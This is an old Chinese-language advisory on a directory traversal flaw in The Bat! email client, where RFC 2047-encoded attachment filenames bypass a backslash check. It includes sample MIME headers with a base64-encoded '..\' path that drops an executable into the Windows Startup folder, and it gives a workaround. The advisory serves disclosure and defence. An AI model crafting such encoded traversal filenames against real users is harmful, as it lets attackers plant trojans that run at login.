The Bat! 目录遍历漏洞

/ns/ld/softld/data/20010114123920.htm

The Bat! 目录遍历漏洞 (APP,缺陷)

涉及程序:
The Bat!

描述：
The Bat! 保存附件导致目录遍历漏洞

详细：
The Bat! 是一款非常好用易用的邮件客户端软件。它具有一个功能是允许用户将附
件保存到指定的目录中。该功能默认并没有开启,不过通常大家都喜欢使用该功能。

如果附件文件名是明文，The Bat! 不允许文件名中出现'\'符号。但是，如果文件名
按照 RFC 2047 进行编码，The Bat! 将不进行检查。因此攻击者可以将包含"..\"的
路径名进行编码，这样攻击者在保存附件时就可以保存任意文件到任意目录，甚至将
木马或后门保存到启动目录下。


以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负


默认情况下 The Bat!将附件保存在 C:\Program Files\The
Bat!\MAIL\%USERNAME%\Attach 目录下。如果设置了邮件的下列部分：

Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="=?iso8859-1?B?Li5cLi5cLi5cLi5cLi5cV2luZG93c1xTdGFydCBNZW51XFByb2
dyYW1zXFN0YXJ0dXBcMTIzLmV4ZQ==?="

将会把附件保存到下列目录：
C:\Windows\Start Menu\Programs\Startup\123.exe
( ..\..\..\..\..\Windows\Start Menu\Programs\Startup\123.exe )

受影响的系统:
The Bat! Version <= 1.48f
- Microsoft Windows 95/98
- Microsoft Windows NT
- Microsoft Windows 2000

解决方案：
临时解决办法：
禁用"File attachment stored separate from message"选项